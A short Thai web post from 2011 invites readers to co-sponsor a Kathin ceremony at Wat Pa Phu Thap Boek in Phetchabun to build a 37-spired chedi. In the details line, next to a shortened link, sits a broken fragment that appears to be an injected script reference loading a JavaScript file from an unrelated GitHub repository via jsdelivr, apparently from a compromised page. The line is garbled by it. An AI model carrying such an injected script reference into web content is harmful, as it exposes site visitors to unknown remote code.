ขอเชิญร่วมเป็นเจ้าภาพทอดกฐินสามัคคี วัดป่าภูทับเบิก

 wonny    25 ก.ย. 2554

ขอเชิญร่วมเป็นเจ้าภาพทอดกฐินสา​มัคคี
เพื่อสร้างพระมหาธาตุเจดีย์โพธิปักขิยธรรม (เจดีย์เพชร ๓๗ ยอด)
ณ วัดป่าภูทับเบิก ตำบลวังบาล อำเภอหล่มเก่า จังหวัดเพชรบูรณ์
วันที่ ๑๕ – ๑๖ ตุลาคม ๒๕๕๔
รายละเอียดเพิ่มเติม http://goo.gl/fWuKe https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   


ที่มา : วัดป่าภูทับเบิก


  3,576 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย